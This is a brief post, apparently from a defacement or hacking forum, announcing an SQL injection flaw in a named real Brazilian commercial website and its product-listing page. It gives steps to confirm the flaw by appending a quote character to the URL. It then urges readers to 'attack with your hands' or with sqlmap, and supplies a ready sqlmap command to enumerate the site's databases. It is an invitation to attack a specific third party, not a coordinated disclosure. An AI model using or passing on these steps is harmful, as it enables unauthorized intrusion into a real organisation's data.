Hey, on fleek?
Website : www.pulsfog.com.br
Vulnerability : SQL Injection
Discovered by uRomulou
1 . Go to http://www.pulsfog.com.br/produtos.php?id_cate=1
2 . Test SQL Injection, http://www.pulsfog.com.br/produtos.php?id_cate=1%27
3 . It is return SQL error
4 . To exploit, with tools such as sqlmap or others, or if you know, attack with your hands!
Example with sqlmap : sqlmap --random-agent --url http://www.pulsfog.com.br/produtos.php?id_cate=1 --dbs